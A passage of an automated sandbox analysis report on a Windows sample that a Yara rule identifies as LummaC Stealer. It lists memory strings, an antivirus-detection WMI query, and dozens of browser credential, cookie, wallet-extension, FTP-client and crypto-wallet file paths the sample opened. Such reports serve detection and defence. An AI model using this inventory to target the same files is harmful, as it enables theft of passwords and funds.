                Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000003.1499562858.00000000016AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: jSFUzuYPG9.exeString found in binary or memory: Wallets/Electrum
                Source: jSFUzuYPG9.exeString found in binary or memory: Wallets/ElectronCash
                Source: jSFUzuYPG9.exeString found in binary or memory: window-state.json
                Source: jSFUzuYPG9.exe, 00000000.00000003.1451476737.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyn
                Source: jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: jSFUzuYPG9.exeString found in binary or memory: Wallets/Ethereum
                Source: jSFUzuYPG9.exe, 00000000.00000003.1477686530.00000000016A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
